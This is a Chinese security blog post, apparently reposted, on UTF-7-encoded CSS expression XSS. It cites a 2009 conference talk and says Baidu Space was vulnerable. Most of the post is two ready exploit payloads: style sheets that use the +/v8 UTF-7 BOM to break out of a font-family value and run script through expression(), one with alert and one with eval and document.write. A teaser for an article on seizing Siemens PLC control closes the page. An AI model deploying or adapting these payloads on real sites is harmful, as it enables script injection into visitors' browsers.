utf-7 编码跨站工具,utf-7 编码 解码工具下载:https://lcx.cc/post/1199/
utf-7 编码跨站漏洞,是09年某黑客大会提出来的(XSS Lightsaber techniques using Hackvertor,CONFidence2009_gareth_heyes.pdf),不过国内一直无人研究。
百度空间存在该漏洞很久了,目前才修复(不知道那个蛋疼的提交到乌云了)。
XSS Lightsaber techniques using Hackvertor,CONFidence2009_gareth_heyes.pdf,该书下载地址:XSS Lightsaber techniques using Hackvertor,CONFidence2009_gareth_heyes.pdf
CSS expressions with UTF-7
- UTF-7 BOM character can force UTF-7 in a external style sheet
- Would you let me upload a style sheet?
- @charset ?UTF-7?; works
- But you don?t need it
- +/v8 is all you need
----------------------------------------------
CSS expressions with UTF-7
- UTF-7 BOM 字符可以强制在一个外部样式表(css)中使用 UTF-7 编码
- 你会让我上传一个样式表?
- @charset ?UTF-7?; works
- 但是你不需要它!
- +/v8 是你需要的
----------------------------------------------
注意:“+/v8”必须放在文件开头!
----------------------------------------------
原版 Exp:
+/v8
body {
font-family:'+AHgAJwA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApADsAZgBvAG4AdAAtAGYAYQBtAGkAbAB5ADoAJw-';
}
//x';xss:expression(alert(1));font-family:'
改良 Exp:
+/v8
body {
font-family:"+AHgAIgA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoACgAdwBpAG4AZABvAHcALgB4AG8AeAA9AD0AMQApAD8AJwAnADoAZQB2AGEAbAAoACIAeABvAHgAPQAxADsAZQB2AGEAbAAoAGEAbABlAHIAdAAoAC8AWABTAFMAIQAvACkAKQA7ACIAKQApADsAZgBvAG4AdAAtAGYAYQBtAGkAbAB5ADoAI-";
}
//x";xss:expression((window.xox==1)?'':eval("xox=1;eval(alert(/XSS!/));"));font-family:"
//x";xss:expression((window.xox==1)?'':eval("xox=1;document.write('');"));font-family:"
文章来源于lcx.cc:【XSS】CSS expressions with UTF-7编码
之前看到GeekPwn的官微上也有一些关于工控的报名,这里也为大家分享一个从快速搭建环境(项目相对简单),到如何在该环境下快速PWN掉西门子PLC接管控制的案例,知其然,知其所以然。 0x1、前言 因为一系列安全事件的发生,工控安全这个概念在近些年被炒得火热,…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论